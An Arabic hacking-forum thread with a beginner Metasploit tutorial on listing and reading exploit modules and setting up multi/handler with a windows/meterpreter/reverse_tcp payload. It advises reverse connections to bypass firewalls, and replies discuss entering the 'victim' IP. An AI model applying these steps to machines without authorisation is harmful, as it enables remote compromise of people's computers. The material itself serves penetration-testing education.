[الدرس الخامس] الاكسبلويت واستخداماتها وانواعها

المجهووول · 09-22-2009, 11:25 AM

بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاتة

اول شيء :كل عام وانتم الى الله اقرب
ثاني شيء
كيف احوالكم وصحتكم وان شاء الله تكونو بخير وتصوموا ستة شوال مو مثلي :D
ثالث شيء اليوم درسنا عن الاسكبلويت exploits وما هي انواعها ووظيفتها
ووظيفتها يكمن في اسمها ونوعها

يعني درس بسيط ومفهوم بأذن الله

لأستعراض الـ exploit نضع الامر

كود PHP:

  show exploits

الآن رح يظهر امامنا الثغرات

ملاحظة للثغرات والبايلود واقسامها
تكون كذا

windows/browser/yahoomessenger_fvcom

windows/ browser/ yahoomessenger_fvcom
اسم الثغرة | النوع او البرنامج المصاب | نوع النظام المصاب بالثغرة

هذه بأختصار
الآ نجي نشملها شوي
windows : كما ذكرت سابقا وهي ترمز لنوع النظام المصاب ولا يقتصر فقط على وندز وانما يشمل الجميع منل لينوكس ويونكس .. وقليل جدا ما تلاقي لينوكس ويونكس لقلة الثغرات الموجودة به لانه يستعمل امتداد tar.giz اذافة الى انها لا تحتاج اي كراك ولا غيرها ولا برامج تنفيذية .ز يعني لا يشغلها
browser : نوع البرنامج المصاب وهنا في هذه الحالة المتصفح Internet Explorer وانتم تعرفونه وتعرفون ثغرات .. بس بالميتاسبلويت جاهزة وكمان ثغرات ذات امتداد صورة :D افرح يا ولد :057:

yahoomessenger_fvcom : اسم الثغرة في مجلد الميتاسبلويت ويلزم ان يكون اسم الثغرة حسب ما هو مطلوب ضمن اكواد الثغرة

هيك هي تقسم الثغرة الى ثلاث اقسام وهي نوع النظام ونوع البرنامج المصاب واسم الثغرة

الآن لتعرف ماذا تعمل هذه الثغرة او ما البرنامج المصاب واصداره .. يكون موجود في الجانب الايمن شرح موجز بسيط عنه او بأمكانك وضع كلمة Info متبوعة بألثغرة يعني في مثالنا الاعلى يعني يكون الامر كذا
info windows/browser/yahoomessenger_fvcom

الآن يوجد ثغرات شاذة
مثل :...!!

كود PHP:

  test/aggressivetest

كود PHP:

  test/exploitme

كود PHP:

  test/kernel

فهي واضحة
تعمل اختيار سواء لسيرفر او نواة كيرنل

ويوجد هذه ايضا

كود PHP:

  multi/handler

الاغلب يظن ثغرة وهذه يا اخوان هي شبيه جدا بالنت كات .. تعمل تصنت .. لكن فقط تستعمل للميتاسبلويت لانه في اعداداتها يلزمك تضع البايلود والاي بي والبورت ... ما يهمنا الاي بي والبورت لكن اذ لم تضع البايلود فلت يتم الاستغلال يعني لا تستخدم في تصنت على سيرفرات وسيف مود .. ألخ

وهنا سأشرح استخدامها
اول شيء تستخدم امر استخدام الثغرو

كود PHP:

  use multi/handler

ثاني شيء امر ادخال اي بي جهازك للتصنت

كود PHP:

  set LHOST 192.168.4.101

ثالث امر ادخال البورت الذي وضعته في خيارات الثغرة او البايلود <<< رح تفهمها قريباا

كود PHP:

  set LPORT 9999

وبأمكانك وضع اي بورت استخدمته انت في اختيارتك للثغرة

رابع امر وهو اختيار البايلود التي وضعتها في استغلالك لثغرة ما او وضعتها عند انشائك لبايلود .. فتضعها هناا

كود PHP:

  set PAYLOAD windows/meterpreter/reverse_tcp

ويفضل للجميع اختيار الاتصال العكسي لتخطي الجدار الناري اذا لم يكن مفتوح بورت .. وهذا بعد التأكد من ان البورت مفتوح

####
اعرف طولتها عليكم
والاغلب مافهم منيح
لكن بعد الدروس القادمة رح تكونون فاهمين كل شيء ... !

$##$#$#$#$#$$$#$#$
تحياتي
لا للاحتكار
المجهوول

المصدر: :: vBspiders Professional Network ::

Fhg]vs hgohlsD hgh;sfg,dj ,hsjo]hlhjih ,hk,huih

data$hack · 09-22-2009, 07:21 PM

بارك الله فيك

KaLa$nikoV · 09-22-2009, 10:23 PM

مبدع ما شاء الله

المجهووول · 09-23-2009, 12:34 AM

الله يخليكم

ابو بدر · 09-23-2009, 03:53 AM

الله لا يحرمنا منك
واصل ابداعك
سلام

ThE BiGeSt JoKeR · 11-13-2009, 03:09 PM

بطل و الله بطل

شرح راائع جدا و مفيد

لكن

اقتباس


	ثاني شيء امر ادخال اي بي جهازك للتصنت كود PHP: `set RHOST 192.168.4.101`

عارف طولت عليك بالاسئله و مالي داعي
خخخخخخ

معليش بس تحملني ><
"""
بس هو الواحد اذا سوى امر set RHOST XXXXXX

RHOST = اي بي الضحيه اذا ما خاب ظني

يعني قصدك ادخل اي بي الضحيه و ليس اي بي جهاز ... صح ^^

خخخخخخخخخخخ

عندي شيء صغير ايضاً

في الاتصال العكسي
هو انا ادخل اي بي الشبكه اللي انا شابك عليها
و لا ادخل www.ip-adress.com و احط الـ اي بي تبعي

و كذا هو الحال مع الضحيه؟

مشكوور يا حوبي على الدرس الراائع ^^

هذا يا حبيبي و السلام ^^

المجهووول · 11-13-2009, 04:38 PM

اها سوري اخطأت مطبعي
اي بي جهاز لكن هي LHOST
في حالة اختراقك للشبكة تضع اي بي الشبكة بتاع جهازك اما اذا في حال اختراق شخص خارج الشبكة بتضع الاي بي بتاع الجهاز ip-adress.com
ومشكور اخوي ع المتابعة
##
تحياتي
لا للاحتكار
المجهوول

ThE BiGeSt JoKeR · 11-13-2009, 04:50 PM

يسلمووووووو يا حبي على التوضيح ^^

المجهووول · 11-16-2009, 10:17 PM

سلمت يا غالي

v.i.r.u.s · 02-07-2010, 06:43 PM

بارك الله فيك اخى وجزاك خيرا على المجهود
سبحان الله وبحمدة سبحان الله العظيم

Mr.$LeV!n · 02-14-2010, 03:49 PM

مشكووور على الشرح

blablabou94 · 02-21-2010, 10:31 PM

شكرا لك يا حبيبي العزيز والله أنت عندك دروس موش نورمال

D-GhosT s3cur!Ty-Z · 03-25-2010, 09:22 PM

شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية . شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

Abood Noiseless · 09-26-2010, 01:15 PM

مشششششششششششششكككككككككككككورا - يعطيك العافية -

ouTLaw · 11-26-2010, 07:56 PM

بارك الله فيك اخى وجزاك خيرا

المواضيع المتشابهه
الموضوع	كاتب الموضوع	المنتدى	مشاركات	آخر مشاركة
الدرس الخامس (الاوامر الشرطية)	SoLiTair4Ever	برمجة الويب	1	09-29-2013 11:22 PM
لدي مشكلة في الدرس الخامس	kais bettaieb	جـــ'ابات العناكــ'ب	8	07-10-2010 03:09 PM
استفسار متاخر :$ عن الدرس الخامس	barca-x	جـــ'ابات العناكــ'ب	3	04-23-2010 11:17 PM

[الدرس الخامس] الاكسبلويت واستخداماتها وانواعها

MetaSploit